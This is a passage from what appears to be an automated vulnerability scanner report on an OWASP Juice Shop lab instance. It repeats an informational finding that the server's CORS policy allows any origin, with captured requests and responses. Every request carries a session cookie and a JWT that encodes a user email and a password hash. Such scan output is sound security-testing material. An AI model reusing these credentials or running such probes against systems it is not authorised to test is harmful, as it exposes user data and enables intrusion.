Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:31 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.57. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qmiegcgbhpzg.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://qmiegcgbhpzg.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:44 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.58. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/fontawesome/css/font-awesome.min.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vecgqxjmrfvt.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/fontawesome/css/font-awesome.min.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vecgqxjmrfvt.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:58 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.59. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://cfdbwxklvlnx.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://cfdbwxklvlnx.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:03 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.60. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://gjjcueddqtdc.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://gjjcueddqtdc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:04 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.61. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/jquery/dist/jquery.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://iowuhqohmwcz.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://iowuhqohmwcz.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:14 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.62. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/moment/min/moment.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lacczymhzxvc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/moment/min/moment.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://lacczymhzxvc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:29 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.63. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://gqnrsvoacaxg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://gqnrsvoacaxg.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:34 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.64. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://getmtgxrkthr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://getmtgxrkthr.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:35 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.65. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dfxcsinnqyyk.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://dfxcsinnqyyk.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:45 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.66. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/qrcode-generator/js/qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://duwlwjeudoum.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://duwlwjeudoum.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:02 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.67. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/string/dist/string.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://bzvfurwajlux.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/string/dist/string.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://bzvfurwajlux.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:09 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.68. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/underscore/underscore.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vlmwjrlzxnpe.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/underscore/underscore.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vlmwjrlzxnpe.com
